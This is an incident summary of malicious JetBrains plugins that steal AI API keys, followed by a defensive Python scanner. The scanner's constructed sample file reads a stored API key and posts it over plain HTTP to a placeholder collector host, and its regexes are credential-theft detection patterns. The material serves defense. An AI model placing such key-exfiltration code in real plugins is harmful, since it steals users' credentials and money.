What happened
A coordinated supply-chain campaign between October 2025 and June 2026 published at least 15 malicious JetBrains plugins that exfiltrate AI provider API keys. Two prominent plugins (CodeGPT, DeepSeek AI Assist) each had over 25,000 downloads. The plugins were confirmed to still contain credential-theft code at the time of reporting on June 16, 2026.
Why it matters
AI developers are a high-value target: their API keys grant access to frontier models and carry a monetary cost whenever they are used, so stolen keys have direct resale value. This supply-chain attack compromises the very development tools used to build AI systems. Stolen keys can be resold, used for reconnaissance, or used to poison datasets via API manipulation.
Attack vector
The attacker publishes malicious IDE plugins under several different vendor accounts on the JetBrains Marketplace. The plugins pose as legitimate AI coding assistants (CodeGPT, DeepSeek AI Assist, etc.) and ship genuine-looking code review, commit message, and Git utility features. When a developer enters an API key into the plugin settings, the plugin exfiltrates that key to an attacker-controlled server over plain HTTP.
Affected systems
JetBrains Marketplace plugins (15 malicious extensions); affects developers using OpenAI, DeepSeek, and SiliconFlow integrations.
Mitigation
JetBrains: implement code scanning for credential-theft patterns in marketplace plugins. Developers: use IDE credential managers with encryption; rotate API keys immediately; enable API key usage monitoring and rate-limit alerts.
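The attack vector above and the first mitigation (marketplace code scanning for credential-theft patterns) can be illustrated with a small static scanner. This is an added example written for this summary, not tooling from JetBrains or from the report; the indicator patterns are assumptions (a file that reads an AI API key or the IDE credential store, builds a plaintext http:// URL, and makes an outbound request), and the Kotlin-like sample sources and the collector host are constructed placeholders.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Heuristic indicators (assumed for this example, not taken from the report):
# (1) the file reads a setting or secret that looks like an AI provider API key,
# (2) it builds a plaintext http:// URL to a non-loopback host,
# (3) it performs an outbound HTTP request.  All three in one file is the signal.
KEY_ACCESS = re.compile(r"(?i)(api[_-]?key|openai|deepseek|siliconflow)\w*\s*[=:(]"
                        r"|PasswordSafe|CredentialAttributes")
PLAIN_HTTP = re.compile(r'"http://(?!localhost|127\.0\.0\.1)([^"/\s]+)')
OUTBOUND = re.compile(r"HttpURLConnection|OkHttpClient|HttpClient|\.openConnection\(")

@dataclass
class Finding:
    path: str
    reasons: List[str] = field(default_factory=list)
    hosts: List[str] = field(default_factory=list)

def scan_source(path: str, text: str) -> Optional[Finding]:
    """Return a Finding only when key access, plaintext URL and outbound call co-occur."""
    f = Finding(path)
    if KEY_ACCESS.search(text):
        f.reasons.append("reads an AI provider API key or the IDE credential store")
    hosts = sorted(set(PLAIN_HTTP.findall(text)))
    if hosts:
        f.reasons.append("builds a plaintext http:// URL")
        f.hosts = hosts
    if OUTBOUND.search(text):
        f.reasons.append("performs an outbound HTTP request")
    # A client that reads a key and talks https to its provider is normal; require all three.
    return f if len(f.reasons) == 3 else None

def scan_plugin(files: Dict[str, str]) -> List[Finding]:
    """Scan every source file of an unpacked plugin and keep the suspicious ones."""
    return [r for p, t in files.items() if (r := scan_source(p, t))]

# Constructed Kotlin-like sources; "collector.example" is a placeholder, not a real IoC.
SAMPLE_PLUGIN = {
    "benign/OpenAiClient.kt": """
        val key = PasswordSafe.instance.getPassword(CredentialAttributes("openai.apiKey"))
        val conn = URL("https://api.openai.com/v1/chat/completions").openConnection() as HttpURLConnection
    """,
    "malicious/Telemetry.kt": """
        val apiKey = settings.state.apiKey
        val conn = URL("http://collector.example/collect").openConnection() as HttpURLConnection
        conn.outputStream.write(apiKey.toByteArray())
    """,
}

if __name__ == "__main__":
    for finding in scan_plugin(SAMPLE_PLUGIN):
        print(finding.path, "->", "; ".join(finding.reasons), finding.hosts)
```

Run against the constructed sample it reports only the Telemetry file; the benign client, which reads the key from PasswordSafe but only talks HTTPS to its provider, is not flagged.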